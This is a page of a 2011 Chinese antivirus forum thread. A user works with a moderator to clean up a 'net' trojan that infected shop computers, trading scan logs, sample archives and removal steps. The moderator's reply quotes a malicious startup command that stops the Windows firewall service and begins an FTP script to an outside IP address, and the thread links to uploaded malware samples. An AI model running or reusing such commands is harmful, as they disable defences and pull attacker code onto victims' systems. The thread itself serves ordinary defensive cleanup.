net use bye xuzijianyes /add(net病毒) - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛 net use bye xuzijianyes /add(net病毒)

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

2 / 3 页

跳转页

net use bye xuzijianyes /add(net病毒)

本主题由大版主 networkedition 于 2012-2-23 15:56:35 执行移动主题操作

吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:	发表于： 2011-05-31 17:35 \| 只看楼主短消息资料字号：小中大 11楼回复: net use bye xuzijianyes /add(net病毒) 在c:\windows\system32下面，找到了木马作者的自我介绍：斯文哥又来抓鸡了，唉QQ413968336 斯文哥又来抓鸡了，唉QQ413968336 斯文哥又来抓鸡了，唉QQ413968336 子健哥又来抓鸡了，唉QQ413968336 子健哥又来抓鸡了，唉QQ413968336 子健哥又来抓鸡了，唉QQ413968336 子健哥又来抓鸡了，唉QQ413968336 Sun网络 www.muhuo.com 冷炫哥哥在次辉煌起来QQ 11156454. 清风可否吹走破碎的梦。附上我找到的可疑文件：附件: 新建文件夹.zip (2011-5-31 17:35:08, 802.13 K) 该附件被下载次数 324
吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:

吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:	发表于： 2011-05-31 17:50 \| 只看楼主短消息资料字号：小中大 12楼回复: net use bye xuzijianyes /add(net病毒) 这木马真小人，放那么多东西，害我电脑什么都用不了，只能移动鼠标查看东西了。附上扫描文件：附件: SREngLOG.log (2011-5-31 17:50:23, 143.84 K) 该附件被下载次数 262
吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:

湖心小筑拙长孩提狮帖子:130 注册: 2006-08-28 来自:	发表于： 2011-05-31 18:47 \| 短消息资料字号：小中大 13楼回复：net use bye xuzijianyes /add(net病毒) 能否留QQ交流
湖心小筑拙长孩提狮帖子:130 注册: 2006-08-28 来自:

吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:	发表于： 2011-05-31 18:49 \| 只看楼主短消息资料字号：小中大 14楼回复: net use bye xuzijianyes /add(net病毒) 我QQ号码是475553712
吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2011-06-01 10:04 \| 短消息资料字号：小中大 15楼回复 9F 吴文和的帖子此样本已收集反馈。另12楼的日志分析如下：下载此工具：http://bbs.ikaka.com/attachment.aspx?attachmentid=653828删除以下文件 c:\documents and settings\all users\application data\storm\update\%sessionname%\yetgd.cc3 c:\documents and settings\all users\drm\%sessionname%\dlvvm.cc3 c:\documents and settings\all users\application data\storm\update\%youshizhuay%\fbguc.cc3 启动项目－－注册表之如下项删除： [shell] <c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 14.210.97.246 > shell如果无法删除可以添加everyone并设置完全控制权限之后再删除此项。另如方便请将c:\program files\benchi.exe压缩发来。
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2011-06-01 10:11 \| 短消息资料字号：小中大 16楼回复 11F 吴文和的帖子 11楼样本瑞星可以查杀杀之.jpg (100.96 K) 2011-6-1 10:10:46
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:	发表于： 2011-06-01 12:08 \| 只看楼主短消息资料字号：小中大 17楼回复 15F networkedition 的帖子谢谢大版主。benchi.exe估计被我删除了。而且对方系统也还原了。应该还有其他店铺电脑存在相同问题，我找到了压缩上来。这木马释放的文件太多了，我也只是找到了一部分。找到可疑文件后我也会压缩放上去。
吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:

吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:	发表于： 2011-06-01 12:16 \| 只看楼主短消息资料字号：小中大 18楼回复 16F networkedition 的帖子为了不影响店铺销售，我直接恢复了系统，其他盘符未作任何处理，留待查看。有新的可疑文件马上压缩过来。谢谢大版主，谢谢广大网友。
吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2011-06-01 14:42 \| 短消息资料字号：小中大 19楼回复：net use bye xuzijianyes /add(net病毒) 9楼样本： 1、文件名：nqmwj.mp3 病毒名：Trojan.Win32.Fednu.ddh 2、文件名：yetgd.cc3 病毒名：Backdoor.Win32.LastOne.tc 3、文件名：lcoef.cc3 不是病毒
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:	发表于： 2011-06-27 10:59 \| 只看楼主短消息资料字号：小中大 20楼回复 8F networkedition 的帖子今天发现了新net病毒变种，不知道对大版主有用没？先传扫描文件，具体上传哪些文件等待大版主通知。扫描文件：附件: SREngLOG.log (2011-6-27 11:01:33, 43.39 K) 该附件被下载次数 241 吴文和最后编辑于 2011-06-27 11:01:33
吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:

<<上一主题|下一主题>>

2 / 3 页

跳转页

页面顶部

Powered by Discuz!NT